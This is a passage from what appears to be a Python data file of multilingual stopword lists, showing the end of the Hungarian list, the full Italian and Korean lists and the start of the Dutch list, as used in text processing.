\"tizenhét\",\n        \"tizenkettedik\",\n        \"tizenkettő\",\n        \"tizenkilenc\",\n        \"tizenkét\",\n        \"tizennyolc\",\n        \"tizennégy\",\n        \"tizenöt\",\n        \"tizet\",\n        \"tovább\",\n        \"további\",\n        \"továbbá\",\n        \"távol\",\n        \"téged\",\n        \"tényleg\",\n        \"tíz\",\n        \"több\",\n        \"többi\",\n        \"többször\",\n        \"túl\",\n        \"tőle\",\n        \"tőled\",\n        \"tőlem\",\n        \"tőletek\",\n        \"tőlük\",\n        \"tőlünk\",\n        \"ugyanakkor\",\n        \"ugyanez\",\n        \"ugyanis\",\n        \"ugye\",\n        \"urak\",\n        \"uram\",\n        \"urat\",\n        \"utoljára\",\n        \"utolsó\",\n        \"után\",\n        \"utána\",\n        \"vagy\",\n        \"vagyis\",\n        \"vagyok\",\n        \"vagytok\",\n        \"vagyunk\",\n        \"vajon\",\n        \"valahol\",\n        \"valaki\",\n        \"valakit\",\n        \"valamelyik\",\n        \"valami\",\n        \"valamint\",\n        \"való\",\n        \"van\",\n        \"vannak\",\n        \"vele\",\n        \"veled\",\n        \"velem\",\n        \"veletek\",\n        \"velük\",\n        \"velünk\",\n        \"vissza\",\n        \"viszlát\",\n        \"viszont\",\n        \"viszontlátásra\",\n        \"volna\",\n        \"volnának\",\n        \"volnék\",\n        \"volt\",\n        \"voltak\",\n        \"voltam\",\n        \"voltunk\",\n        \"végre\",\n        \"végén\",\n        \"végül\",\n        \"által\",\n        \"általában\",\n        \"ám\",\n        \"át\",\n        \"éljen\",\n        \"én\",\n        \"éppen\",\n        \"érte\",\n        \"érted\",\n        \"értem\",\n        \"értetek\",\n        \"értük\",\n        \"értünk\",\n        \"és\",\n        \"év\",\n        \"évben\",\n        \"éve\",\n        \"évek\",\n        \"éves\",\n        \"évi\",\n        \"évvel\",\n        \"így\",\n        \"óta\",\n        \"ön\",\n        \"önbe\",\n        \"önben\",\n        \"önből\",\n        \"önhöz\",\n        \"önnek\",\n        \"önnel\",\n        \"önnél\",\n        \"önre\",\n        \"önről\",\n        \"önt\",\n        \"öntől\",\n        \"önért\",\n        \"önök\",\n        \"önökbe\",\n        \"önökben\",\n        \"önökből\",\n        \"önöket\",\n        \"önökhöz\",\n        \"önökkel\",\n        \"önöknek\",\n        \"önöknél\",\n        \"önökre\",\n        \"önökről\",\n        \"önöktől\",\n        \"önökért\",\n        \"önökön\",\n        \"önön\",\n        \"össze\",\n        \"öt\",\n        \"ötven\",\n        \"ötödik\",\n        \"ötödiket\",\n        \"ötöt\",\n        \"úgy\",\n        \"úgyis\",\n        \"úgynevezett\",\n        \"új\",\n        \"újabb\",\n        \"újra\",\n        \"úr\",\n        \"ő\",\n        \"ők\",\n        \"őket\",\n        \"őt\",\n    ],\n    \"it\": [\n        \"IE\",\n        \"a\",\n        \"abbastanza\",\n        \"abbia\",\n        \"abbiamo\",\n        \"abbiano\",\n        \"abbiate\",\n        \"accidenti\",\n        \"ad\",\n        \"adesso\",\n        \"affinche\",\n        \"agl\",\n        \"agli\",\n        \"ahime\",\n        \"ahimè\",\n        \"ai\",\n        \"al\",\n        \"alcuna\",\n        \"alcuni\",\n        \"alcuno\",\n        \"all\",\n        \"alla\",\n        \"alle\",\n        \"allo\",\n        \"allora\",\n        \"altri\",\n        \"altrimenti\",\n        \"altro\",\n        \"altrove\",\n        \"altrui\",\n        \"anche\",\n        \"ancora\",\n        \"anni\",\n        \"anno\",\n        \"ansa\",\n        \"anticipo\",\n        \"assai\",\n        \"attesa\",\n        \"attraverso\",\n        \"avanti\",\n        \"avemmo\",\n        \"avendo\",\n        \"avente\",\n        \"aver\",\n        \"avere\",\n        \"averlo\",\n        \"avesse\",\n        \"avessero\",\n        \"avessi\",\n        \"avessimo\",\n        \"aveste\",\n        \"avesti\",\n        \"avete\",\n        \"aveva\",\n        \"avevamo\",\n        \"avevano\",\n        \"avevate\",\n        \"avevi\",\n        \"avevo\",\n        \"avrai\",\n        \"avranno\",\n        \"avrebbe\",\n        \"avrebbero\",\n        \"avrei\",\n        \"avremmo\",\n        \"avremo\",\n        \"avreste\",\n        \"avresti\",\n        \"avrete\",\n        \"avrà\",\n        \"avrò\",\n        \"avuta\",\n        \"avute\",\n        \"avuti\",\n        \"avuto\",\n        \"basta\",\n        \"bene\",\n        \"benissimo\",\n        \"berlusconi\",\n        \"brava\",\n        \"bravo\",\n        \"c\",\n        \"casa\",\n        \"caso\",\n        \"cento\",\n        \"certa\",\n        \"certe\",\n        \"certi\",\n        \"certo\",\n        \"che\",\n        \"chi\",\n        \"chicchessia\",\n        \"chiunque\",\n        \"ci\",\n        \"ciascuna\",\n        \"ciascuno\",\n        \"cima\",\n        \"cio\",\n        \"cioe\",\n        \"cioè\",\n        \"circa\",\n        \"citta\",\n        \"città\",\n        \"ciò\",\n        \"co\",\n        \"codesta\",\n        \"codesti\",\n        \"codesto\",\n        \"cogli\",\n        \"coi\",\n        \"col\",\n        \"colei\",\n        \"coll\",\n        \"coloro\",\n        \"colui\",\n        \"come\",\n        \"cominci\",\n        \"comunque\",\n        \"con\",\n        \"concernente\",\n        \"conciliarsi\",\n        \"conclusione\",\n        \"consiglio\",\n        \"contro\",\n        \"cortesia\",\n        \"cos\",\n        \"cosa\",\n        \"cosi\",\n        \"così\",\n        \"cui\",\n        \"d\",\n        \"da\",\n        \"dagl\",\n        \"dagli\",\n        \"dai\",\n        \"dal\",\n        \"dall\",\n        \"dalla\",\n        \"dalle\",\n        \"dallo\",\n        \"dappertutto\",\n        \"davanti\",\n        \"degl\",\n        \"degli\",\n        \"dei\",\n        \"del\",\n        \"dell\",\n        \"della\",\n        \"delle\",\n        \"dello\",\n        \"dentro\",\n        \"detto\",\n        \"deve\",\n        \"di\",\n        \"dice\",\n        \"dietro\",\n        \"dire\",\n        \"dirimpetto\",\n        \"diventa\",\n        \"diventare\",\n        \"diventato\",\n        \"dopo\",\n        \"dov\",\n        \"dove\",\n        \"dovra\",\n        \"dovrà\",\n        \"dovunque\",\n        \"due\",\n        \"dunque\",\n        \"durante\",\n        \"e\",\n        \"ebbe\",\n        \"ebbero\",\n        \"ebbi\",\n        \"ecc\",\n        \"ecco\",\n        \"ed\",\n        \"effettivamente\",\n        \"egli\",\n        \"ella\",\n        \"entrambi\",\n        \"eppure\",\n        \"era\",\n        \"erano\",\n        \"eravamo\",\n        \"eravate\",\n        \"eri\",\n        \"ero\",\n        \"esempio\",\n        \"esse\",\n        \"essendo\",\n        \"esser\",\n        \"essere\",\n        \"essi\",\n        \"ex\",\n        \"fa\",\n        \"faccia\",\n        \"facciamo\",\n        \"facciano\",\n        \"facciate\",\n        \"faccio\",\n        \"facemmo\",\n        \"facendo\",\n        \"facesse\",\n        \"facessero\",\n        \"facessi\",\n        \"facessimo\",\n        \"faceste\",\n        \"facesti\",\n        \"faceva\",\n        \"facevamo\",\n        \"facevano\",\n        \"facevate\",\n        \"facevi\",\n        \"facevo\",\n        \"fai\",\n        \"fanno\",\n        \"farai\",\n        \"faranno\",\n        \"fare\",\n        \"farebbe\",\n        \"farebbero\",\n        \"farei\",\n        \"faremmo\",\n        \"faremo\",\n        \"fareste\",\n        \"faresti\",\n        \"farete\",\n        \"farà\",\n        \"farò\",\n        \"fatto\",\n        \"favore\",\n        \"fece\",\n        \"fecero\",\n        \"feci\",\n        \"fin\",\n        \"finalmente\",\n        \"finche\",\n        \"fine\",\n        \"fino\",\n        \"forse\",\n        \"forza\",\n        \"fosse\",\n        \"fossero\",\n        \"fossi\",\n        \"fossimo\",\n        \"foste\",\n        \"fosti\",\n        \"fra\",\n        \"frattempo\",\n        \"fu\",\n        \"fui\",\n        \"fummo\",\n        \"fuori\",\n        \"furono\",\n        \"futuro\",\n        \"generale\",\n        \"gia\",\n        \"giacche\",\n        \"giorni\",\n        \"giorno\",\n        \"già\",\n        \"gli\",\n        \"gliela\",\n        \"gliele\",\n        \"glieli\",\n        \"glielo\",\n        \"gliene\",\n        \"governo\",\n        \"grande\",\n        \"grazie\",\n        \"gruppo\",\n        \"ha\",\n        \"haha\",\n        \"hai\",\n        \"hanno\",\n        \"ho\",\n        \"i\",\n        \"ieri\",\n        \"il\",\n        \"improvviso\",\n        \"in\",\n        \"inc\",\n        \"infatti\",\n        \"inoltre\",\n        \"insieme\",\n        \"intanto\",\n        \"intorno\",\n        \"invece\",\n        \"io\",\n        \"l\",\n        \"la\",\n        \"lasciato\",\n        \"lato\",\n        \"lavoro\",\n        \"le\",\n        \"lei\",\n        \"li\",\n        \"lo\",\n        \"lontano\",\n        \"loro\",\n        \"lui\",\n        \"lungo\",\n        \"luogo\",\n        \"là\",\n        \"ma\",\n        \"macche\",\n        \"magari\",\n        \"maggior\",\n        \"mai\",\n        \"male\",\n        \"malgrado\",\n        \"malissimo\",\n        \"mancanza\",\n        \"marche\",\n        \"me\",\n        \"medesimo\",\n        \"mediante\",\n        \"meglio\",\n        \"meno\",\n        \"mentre\",\n        \"mesi\",\n        \"mezzo\",\n        \"mi\",\n        \"mia\",\n        \"mie\",\n        \"miei\",\n        \"mila\",\n        \"miliardi\",\n        \"milioni\",\n        \"minimi\",\n        \"ministro\",\n        \"mio\",\n        \"modo\",\n        \"molti\",\n        \"moltissimo\",\n        \"molto\",\n        \"momento\",\n        \"mondo\",\n        \"mosto\",\n        \"nazionale\",\n        \"ne\",\n        \"negl\",\n        \"negli\",\n        \"nei\",\n        \"nel\",\n        \"nell\",\n        \"nella\",\n        \"nelle\",\n        \"nello\",\n        \"nemmeno\",\n        \"neppure\",\n        \"nessun\",\n        \"nessuna\",\n        \"nessuno\",\n        \"niente\",\n        \"no\",\n        \"noi\",\n        \"non\",\n        \"nondimeno\",\n        \"nonostante\",\n        \"nonsia\",\n        \"nostra\",\n        \"nostre\",\n        \"nostri\",\n        \"nostro\",\n        \"novanta\",\n        \"nove\",\n        \"nulla\",\n        \"nuovo\",\n        \"o\",\n        \"od\",\n        \"oggi\",\n        \"ogni\",\n        \"ognuna\",\n        \"ognuno\",\n        \"oltre\",\n        \"oppure\",\n        \"ora\",\n        \"ore\",\n        \"osi\",\n        \"ossia\",\n        \"ottanta\",\n        \"otto\",\n        \"paese\",\n        \"parecchi\",\n        \"parecchie\",\n        \"parecchio\",\n        \"parte\",\n        \"partendo\",\n        \"peccato\",\n        \"peggio\",\n        \"per\",\n        \"perche\",\n        \"perchè\",\n        \"perché\",\n        \"percio\",\n        \"perciò\",\n        \"perfino\",\n        \"pero\",\n        \"persino\",\n        \"persone\",\n        \"però\",\n        \"piedi\",\n        \"pieno\",\n        \"piglia\",\n        \"piu\",\n        \"piuttosto\",\n        \"più\",\n        \"po\",\n        \"pochissimo\",\n        \"poco\",\n        \"poi\",\n        \"poiche\",\n        \"possa\",\n        \"possedere\",\n        \"posteriore\",\n        \"posto\",\n        \"potrebbe\",\n        \"preferibilmente\",\n        \"presa\",\n        \"press\",\n        \"prima\",\n        \"primo\",\n        \"principalmente\",\n        \"probabilmente\",\n        \"proprio\",\n        \"puo\",\n        \"pure\",\n        \"purtroppo\",\n        \"può\",\n        \"qualche\",\n        \"qualcosa\",\n        \"qualcuna\",\n        \"qualcuno\",\n        \"quale\",\n        \"quali\",\n        \"qualunque\",\n        \"quando\",\n        \"quanta\",\n        \"quante\",\n        \"quanti\",\n        \"quanto\",\n        \"quantunque\",\n        \"quasi\",\n        \"quattro\",\n        \"quel\",\n        \"quella\",\n        \"quelle\",\n        \"quelli\",\n        \"quello\",\n        \"quest\",\n        \"questa\",\n        \"queste\",\n        \"questi\",\n        \"questo\",\n        \"qui\",\n        \"quindi\",\n        \"realmente\",\n        \"recente\",\n        \"recentemente\",\n        \"registrazione\",\n        \"relativo\",\n        \"riecco\",\n        \"salvo\",\n        \"sara\",\n        \"sarai\",\n        \"saranno\",\n        \"sarebbe\",\n        \"sarebbero\",\n        \"sarei\",\n        \"saremmo\",\n        \"saremo\",\n        \"sareste\",\n        \"saresti\",\n        \"sarete\",\n        \"sarà\",\n        \"sarò\",\n        \"scola\",\n        \"scopo\",\n        \"scorso\",\n        \"se\",\n        \"secondo\",\n        \"seguente\",\n        \"seguito\",\n        \"sei\",\n        \"sembra\",\n        \"sembrare\",\n        \"sembrato\",\n        \"sembri\",\n        \"sempre\",\n        \"senza\",\n        \"sette\",\n        \"si\",\n        \"sia\",\n        \"siamo\",\n        \"siano\",\n        \"siate\",\n        \"siete\",\n        \"sig\",\n        \"solito\",\n        \"solo\",\n        \"soltanto\",\n        \"sono\",\n        \"sopra\",\n        \"sotto\",\n        \"spesso\",\n        \"srl\",\n        \"sta\",\n        \"stai\",\n        \"stando\",\n        \"stanno\",\n        \"starai\",\n        \"staranno\",\n        \"starebbe\",\n        \"starebbero\",\n        \"starei\",\n        \"staremmo\",\n        \"staremo\",\n        \"stareste\",\n        \"staresti\",\n        \"starete\",\n        \"starà\",\n        \"starò\",\n        \"stata\",\n        \"state\",\n        \"stati\",\n        \"stato\",\n        \"stava\",\n        \"stavamo\",\n        \"stavano\",\n        \"stavate\",\n        \"stavi\",\n        \"stavo\",\n        \"stemmo\",\n        \"stessa\",\n        \"stesse\",\n        \"stessero\",\n        \"stessi\",\n        \"stessimo\",\n        \"stesso\",\n        \"steste\",\n        \"stesti\",\n        \"stette\",\n        \"stettero\",\n        \"stetti\",\n        \"stia\",\n        \"stiamo\",\n        \"stiano\",\n        \"stiate\",\n        \"sto\",\n        \"su\",\n        \"sua\",\n        \"subito\",\n        \"successivamente\",\n        \"successivo\",\n        \"sue\",\n        \"sugl\",\n        \"sugli\",\n        \"sui\",\n        \"sul\",\n        \"sull\",\n        \"sulla\",\n        \"sulle\",\n        \"sullo\",\n        \"suo\",\n        \"suoi\",\n        \"tale\",\n        \"tali\",\n        \"talvolta\",\n        \"tanto\",\n        \"te\",\n        \"tempo\",\n        \"ti\",\n        \"titolo\",\n        \"torino\",\n        \"tra\",\n        \"tranne\",\n        \"tre\",\n        \"trenta\",\n        \"troppo\",\n        \"trovato\",\n        \"tu\",\n        \"tua\",\n        \"tue\",\n        \"tuo\",\n        \"tuoi\",\n        \"tutta\",\n        \"tuttavia\",\n        \"tutte\",\n        \"tutti\",\n        \"tutto\",\n        \"uguali\",\n        \"ulteriore\",\n        \"ultimo\",\n        \"un\",\n        \"una\",\n        \"uno\",\n        \"uomo\",\n        \"va\",\n        \"vale\",\n        \"vari\",\n        \"varia\",\n        \"varie\",\n        \"vario\",\n        \"verso\",\n        \"vi\",\n        \"via\",\n        \"vicino\",\n        \"visto\",\n        \"vita\",\n        \"voi\",\n        \"volta\",\n        \"volte\",\n        \"vostra\",\n        \"vostre\",\n        \"vostri\",\n        \"vostro\",\n        \"è\",\n    ],\n    \"ko\": [\n        \"!\",\n        '\"',\n        \"$\",\n        \"%\",\n        \"&\",\n        \"'\",\n        \"(\",\n        \")\",\n        \"*\",\n        \"+\",\n        \",\",\n        \"-\",\n        \".\",\n        \"...\",\n        \"0\",\n        \"1\",\n        \"2\",\n        \"3\",\n        \"4\",\n        \"5\",\n        \"6\",\n        \"7\",\n        \"8\",\n        \"9\",\n        \";\",\n        \"<\",\n        \"=\",\n        \">\",\n        \"?\",\n        \"@\",\n        \"\\\\\",\n        \"^\",\n        \"_\",\n        \"`\",\n        \"|\",\n        \"~\",\n        \"·\",\n        \"—\",\n        \"——\",\n        \"‘\",\n        \"’\",\n        \"“\",\n        \"”\",\n        \"…\",\n        \"、\",\n        \"。\",\n        \"〈\",\n        \"〉\",\n        \"《\",\n        \"》\",\n        \"가\",\n        \"가까스로\",\n        \"가령\",\n        \"각\",\n        \"각각\",\n        \"각자\",\n        \"각종\",\n        \"갖고말하자면\",\n        \"같다\",\n        \"같이\",\n        \"개의치않고\",\n        \"거니와\",\n        \"거바\",\n        \"거의\",\n        \"것\",\n        \"것과 같이\",\n        \"것들\",\n        \"게다가\",\n        \"게우다\",\n        \"겨우\",\n        \"견지에서\",\n        \"결과에 이르다\",\n        \"결국\",\n        \"결론을 낼 수 있다\",\n        \"겸사겸사\",\n        \"고려하면\",\n        \"고로\",\n        \"곧\",\n        \"공동으로\",\n        \"과\",\n        \"과연\",\n        \"관계가 있다\",\n        \"관계없이\",\n        \"관련이 있다\",\n        \"관하여\",\n        \"관한\",\n        \"관해서는\",\n        \"구\",\n        \"구체적으로\",\n        \"구토하다\",\n        \"그\",\n        \"그들\",\n        \"그때\",\n        \"그래\",\n        \"그래도\",\n        \"그래서\",\n        \"그러나\",\n        \"그러니\",\n        \"그러니까\",\n        \"그러면\",\n        \"그러므로\",\n        \"그러한즉\",\n        \"그런 까닭에\",\n        \"그런데\",\n        \"그런즉\",\n        \"그럼\",\n        \"그럼에도 불구하고\",\n        \"그렇게 함으로써\",\n        \"그렇지\",\n        \"그렇지 않다면\",\n        \"그렇지 않으면\",\n        \"그렇지만\",\n        \"그렇지않으면\",\n        \"그리고\",\n        \"그리하여\",\n        \"그만이다\",\n        \"그에 따르는\",\n        \"그위에\",\n        \"그저\",\n        \"그중에서\",\n        \"그치지 않다\",\n        \"근거로\",\n        \"근거하여\",\n        \"기대여\",\n        \"기점으로\",\n        \"기준으로\",\n        \"기타\",\n        \"까닭으로\",\n        \"까악\",\n        \"까지\",\n        \"까지 미치다\",\n        \"까지도\",\n        \"꽈당\",\n        \"끙끙\",\n        \"끼익\",\n        \"나\",\n        \"나머지는\",\n        \"남들\",\n        \"남짓\",\n        \"너\",\n        \"너희\",\n        \"너희들\",\n        \"네\",\n        \"넷\",\n        \"년\",\n        \"논하지 않다\",\n        \"놀라다\",\n        \"누가 알겠는가\",\n        \"누구\",\n        \"다른\",\n        \"다른 방면으로\",\n        \"다만\",\n        \"다섯\",\n        \"다소\",\n        \"다수\",\n        \"다시 말하자면\",\n        \"다시말하면\",\n        \"다음\",\n        \"다음에\",\n        \"다음으로\",\n        \"단지\",\n        \"답다\",\n        \"당신\",\n        \"당장\",\n        \"대로 하다\",\n        \"대하면\",\n        \"대하여\",\n        \"대해 말하자면\",\n        \"대해서\",\n        \"댕그\",\n        \"더구나\",\n        \"더군다나\",\n        \"더라도\",\n        \"더불어\",\n        \"더욱더\",\n        \"더욱이는\",\n        \"도달하다\",\n        \"도착하다\",\n        \"동시에\",\n        \"동안\",\n        \"된바에야\",\n        \"된이상\",\n        \"두번째로\",\n        \"둘\",\n        \"둥둥\",\n        \"뒤따라\",\n        \"뒤이어\",\n        \"든간에\",\n        \"들\",\n        \"등\",\n        \"등등\",\n        \"딩동\",\n        \"따라\",\n        \"따라서\",\n        \"따위\",\n        \"따지지 않다\",\n        \"딱\",\n        \"때\",\n        \"때가 되어\",\n        \"때문에\",\n        \"또\",\n        \"또한\",\n        \"뚝뚝\",\n        \"라 해도\",\n        \"령\",\n        \"로\",\n        \"로 인하여\",\n        \"로부터\",\n        \"로써\",\n        \"륙\",\n        \"를\",\n        \"마음대로\",\n        \"마저\",\n        \"마저도\",\n        \"마치\",\n        \"막론하고\",\n        \"만 못하다\",\n        \"만약\",\n        \"만약에\",\n        \"만은 아니다\",\n        \"만이 아니다\",\n        \"만일\",\n        \"만큼\",\n        \"말하자면\",\n        \"말할것도 없고\",\n        \"매\",\n        \"매번\",\n        \"메쓰겁다\",\n        \"몇\",\n        \"모\",\n        \"모두\",\n        \"무렵\",\n        \"무릎쓰고\",\n        \"무슨\",\n        \"무엇\",\n        \"무엇때문에\",\n        \"물론\",\n        \"및\",\n        \"바꾸어말하면\",\n        \"바꾸어말하자면\",\n        \"바꾸어서 말하면\",\n        \"바꾸어서 한다면\",\n        \"바꿔 말하면\",\n        \"바로\",\n        \"바와같이\",\n        \"밖에 안된다\",\n        \"반대로\",\n        \"반대로 말하자면\",\n        \"반드시\",\n        \"버금\",\n        \"보는데서\",\n        \"보다더\",\n        \"보드득\",\n        \"본대로\",\n        \"봐\",\n        \"봐라\",\n        \"부류의 사람들\",\n        \"부터\",\n        \"불구하고\",\n        \"불문하고\",\n        \"붕붕\",\n        \"비걱거리다\",\n        \"비교적\",\n        \"비길수 없다\",\n        \"비로소\",\n        \"비록\",\n        \"비슷하다\",\n        \"비추어 보아\",\n        \"비하면\",\n        \"뿐만 아니라\",\n        \"뿐만아니라\",\n        \"뿐이다\",\n        \"삐걱\",\n        \"삐걱거리다\",\n        \"사\",\n        \"삼\",\n        \"상대적으로 말하자면\",\n        \"생각한대로\",\n        \"설령\",\n        \"설마\",\n        \"설사\",\n        \"셋\",\n        \"소생\",\n        \"소인\",\n        \"솨\",\n        \"쉿\",\n        \"습니까\",\n        \"습니다\",\n        \"시각\",\n        \"시간\",\n        \"시작하여\",\n        \"시초에\",\n        \"시키다\",\n        \"실로\",\n        \"심지어\",\n        \"아\",\n        \"아니\",\n        \"아니나다를가\",\n        \"아니라면\",\n        \"아니면\",\n        \"아니었다면\",\n        \"아래윗\",\n        \"아무거나\",\n        \"아무도\",\n        \"아야\",\n        \"아울러\",\n        \"아이\",\n        \"아이고\",\n        \"아이구\",\n        \"아이야\",\n        \"아이쿠\",\n        \"아하\",\n        \"아홉\",\n        \"안 그러면\",\n        \"않기 위하여\",\n        \"않기 위해서\",\n        \"알 수 있다\",\n        \"알았어\",\n        \"앗\",\n        \"앞에서\",\n        \"앞의것\",\n        \"야\",\n        \"약간\",\n        \"양자\",\n        \"어\",\n        \"어기여차\",\n        \"어느\",\n        \"어느 년도\",\n        \"어느것\",\n        \"어느곳\",\n        \"어느때\",\n        \"어느쪽\",\n        \"어느해\",\n        \"어디\",\n        \"어때\",\n        \"어떠한\",\n        \"어떤\",\n        \"어떤것\",\n        \"어떤것들\",\n        \"어떻게\",\n        \"어떻해\",\n        \"어이\",\n        \"어째서\",\n        \"어쨋든\",\n        \"어쩔수 없다\",\n        \"어찌\",\n        \"어찌됏든\",\n        \"어찌됏어\",\n        \"어찌하든지\",\n        \"어찌하여\",\n        \"언제\",\n        \"언젠가\",\n        \"얼마\",\n        \"얼마 안 되는 것\",\n        \"얼마간\",\n        \"얼마나\",\n        \"얼마든지\",\n        \"얼마만큼\",\n        \"얼마큼\",\n        \"엉엉\",\n        \"에\",\n        \"에 가서\",\n        \"에 달려 있다\",\n        \"에 대해\",\n        \"에 있다\",\n        \"에 한하다\",\n        \"에게\",\n        \"에서\",\n        \"여\",\n        \"여기\",\n        \"여덟\",\n        \"여러분\",\n        \"여보시오\",\n        \"여부\",\n        \"여섯\",\n        \"여전히\",\n        \"여차\",\n        \"연관되다\",\n        \"연이서\",\n        \"영\",\n        \"영차\",\n        \"옆사람\",\n        \"예\",\n        \"예를 들면\",\n        \"예를 들자면\",\n        \"예컨대\",\n        \"예하면\",\n        \"오\",\n        \"오로지\",\n        \"오르다\",\n        \"오자마자\",\n        \"오직\",\n        \"오호\",\n        \"오히려\",\n        \"와\",\n        \"와 같은 사람들\",\n        \"와르르\",\n        \"와아\",\n        \"왜\",\n        \"왜냐하면\",\n        \"외에도\",\n        \"요만큼\",\n        \"요만한 것\",\n        \"요만한걸\",\n        \"요컨대\",\n        \"우르르\",\n        \"우리\",\n        \"우리들\",\n        \"우선\",\n        \"우에 종합한것과같이\",\n        \"운운\",\n        \"월\",\n        \"위에서 서술한바와같이\",\n        \"위하여\",\n        \"위해서\",\n        \"윙윙\",\n        \"육\",\n        \"으로\",\n        \"으로 인하여\",\n        \"으로서\",\n        \"으로써\",\n        \"을\",\n        \"응\",\n        \"응당\",\n        \"의\",\n        \"의거하여\",\n        \"의지하여\",\n        \"의해\",\n        \"의해되다\",\n        \"의해서\",\n        \"이\",\n        \"이 되다\",\n        \"이 때문에\",\n        \"이 밖에\",\n        \"이 외에\",\n        \"이 정도의\",\n        \"이것\",\n        \"이곳\",\n        \"이때\",\n        \"이라면\",\n        \"이래\",\n        \"이러이러하다\",\n        \"이러한\",\n        \"이런\",\n        \"이럴정도로\",\n        \"이렇게 많은 것\",\n        \"이렇게되면\",\n        \"이렇게말하자면\",\n        \"이렇구나\",\n        \"이로 인하여\",\n        \"이르기까지\",\n        \"이리하여\",\n        \"이만큼\",\n        \"이번\",\n        \"이봐\",\n        \"이상\",\n        \"이어서\",\n        \"이었다\",\n        \"이와 같다\",\n        \"이와 같은\",\n        \"이와 반대로\",\n        \"이와같다면\",\n        \"이외에도\",\n        \"이용하여\",\n        \"이유만으로\",\n        \"이젠\",\n        \"이지만\",\n        \"이쪽\",\n        \"이천구\",\n        \"이천육\",\n        \"이천칠\",\n        \"이천팔\",\n        \"인 듯하다\",\n        \"인젠\",\n        \"일\",\n        \"일것이다\",\n        \"일곱\",\n        \"일단\",\n        \"일때\",\n        \"일반적으로\",\n        \"일지라도\",\n        \"임에 틀림없다\",\n        \"입각하여\",\n        \"입장에서\",\n        \"잇따라\",\n        \"있다\",\n        \"자\",\n        \"자기\",\n        \"자기집\",\n        \"자마자\",\n        \"자신\",\n        \"잠깐\",\n        \"잠시\",\n        \"저\",\n        \"저것\",\n        \"저것만큼\",\n        \"저기\",\n        \"저쪽\",\n        \"저희\",\n        \"전부\",\n        \"전자\",\n        \"전후\",\n        \"점에서 보아\",\n        \"정도에 이르다\",\n        \"제\",\n        \"제각기\",\n        \"제외하고\",\n        \"조금\",\n        \"조차\",\n        \"조차도\",\n        \"졸졸\",\n        \"좀\",\n        \"좋아\",\n        \"좍좍\",\n        \"주룩주룩\",\n        \"주저하지 않고\",\n        \"줄은 몰랏다\",\n        \"줄은모른다\",\n        \"중에서\",\n        \"중의하나\",\n        \"즈음하여\",\n        \"즉\",\n        \"즉시\",\n        \"지든지\",\n        \"지만\",\n        \"지말고\",\n        \"진짜로\",\n        \"쪽으로\",\n        \"차라리\",\n        \"참\",\n        \"참나\",\n        \"첫번째로\",\n        \"쳇\",\n        \"총적으로\",\n        \"총적으로 말하면\",\n        \"총적으로 보면\",\n        \"칠\",\n        \"콸콸\",\n        \"쾅쾅\",\n        \"쿵\",\n        \"타다\",\n        \"타인\",\n        \"탕탕\",\n        \"토하다\",\n        \"통하여\",\n        \"툭\",\n        \"퉤\",\n        \"틈타\",\n        \"팍\",\n        \"팔\",\n        \"퍽\",\n        \"펄렁\",\n        \"하\",\n        \"하게될것이다\",\n        \"하게하다\",\n        \"하겠는가\",\n        \"하고 있다\",\n        \"하고있었다\",\n        \"하곤하였다\",\n        \"하구나\",\n        \"하기 때문에\",\n        \"하기 위하여\",\n        \"하기는한데\",\n        \"하기만 하면\",\n        \"하기보다는\",\n        \"하기에\",\n        \"하나\",\n        \"하느니\",\n        \"하는 김에\",\n        \"하는 편이 낫다\",\n        \"하는것도\",\n        \"하는것만 못하다\",\n        \"하는것이 낫다\",\n        \"하는바\",\n        \"하더라도\",\n        \"하도다\",\n        \"하도록시키다\",\n        \"하도록하다\",\n        \"하든지\",\n        \"하려고하다\",\n        \"하마터면\",\n        \"하면 할수록\",\n        \"하면된다\",\n        \"하면서\",\n        \"하물며\",\n        \"하여금\",\n        \"하여야\",\n        \"하자마자\",\n        \"하지 않는다면\",\n        \"하지 않도록\",\n        \"하지마\",\n        \"하지마라\",\n        \"하지만\",\n        \"하하\",\n        \"한 까닭에\",\n        \"한 이유는\",\n        \"한 후\",\n        \"한다면\",\n        \"한다면 몰라도\",\n        \"한데\",\n        \"한마디\",\n        \"한적이있다\",\n        \"한켠으로는\",\n        \"한항목\",\n        \"할 따름이다\",\n        \"할 생각이다\",\n        \"할 줄 안다\",\n        \"할 지경이다\",\n        \"할 힘이 있다\",\n        \"할때\",\n        \"할만하다\",\n        \"할망정\",\n        \"할뿐\",\n        \"할수있다\",\n        \"할수있어\",\n        \"할줄알다\",\n        \"할지라도\",\n        \"할지언정\",\n        \"함께\",\n        \"해도된다\",\n        \"해도좋다\",\n        \"해봐요\",\n        \"해서는 안된다\",\n        \"해야한다\",\n        \"해요\",\n        \"했어요\",\n        \"향하다\",\n        \"향하여\",\n        \"향해서\",\n        \"허\",\n        \"허걱\",\n        \"허허\",\n        \"헉\",\n        \"헉헉\",\n        \"헐떡헐떡\",\n        \"형식으로 쓰여\",\n        \"혹시\",\n        \"혹은\",\n        \"혼자\",\n        \"훨씬\",\n        \"휘익\",\n        \"휴\",\n        \"흐흐\",\n        \"흥\",\n        \"힘입어\",\n        \"︿\",\n        \"！\",\n        \"＃\",\n        \"＄\",\n        \"％\",\n        \"＆\",\n        \"（\",\n        \"）\",\n        \"＊\",\n        \"＋\",\n        \"，\",\n        \"０\",\n        \"１\",\n        \"２\",\n        \"３\",\n        \"４\",\n        \"５\",\n        \"６\",\n        \"７\",\n        \"８\",\n        \"９\",\n        \"：\",\n        \"；\",\n        \"＜\",\n        \"＞\",\n        \"？\",\n        \"＠\",\n        \"［\",\n        \"］\",\n        \"｛\",\n        \"｜\",\n        \"｝\",\n        \"～\",\n        \"￥\",\n    ],\n    \"nl\": [\n        \"aan\",\n        \"achte\",\n        \"achter\",\n        \"af\",\n        \"al\",\n        \"alle\",\n        \"alleen\",\n        \"alles\",\n        \"als\",\n        \"ander\",\n        \"anders\",\n        \"beetje\",\n        \"behalve\",\n        \"beide\",\n        \"beiden\",\n        \"ben\",\n        \"beneden\",\n        \"bent\",\n        \"bij\",\n        \"bijna\",\n        \"bijv\",\n        \"blijkbaar\",\n        \"blijken\",\n        \"boven\",\n        \"bv\",\n        \"daar\",\n        \"daardoor\",\n        \"daarin\",\n        \"daarna\",\n        \"daarom\",\n        \"daaruit\",\n        \"dan\",\n        \"dat\",\n        \"de\",\n        \"deden\",\n        \"deed\",\n        \"derde\",\n        \"derhalve\",\n        \"dertig\",\n        \"deze\",\n        \"dhr\",\n        \"die\",\n        \"dit\",\n        \"doe\",\n        \"doen\",\n        \"doet\",\n        \"door\",\n        \"drie\",\n        \"duizend\",\n        \"echter\",\n        \"een\",\n        \"eens\",\n        \"eerst\",\n        \"eerste\",\n        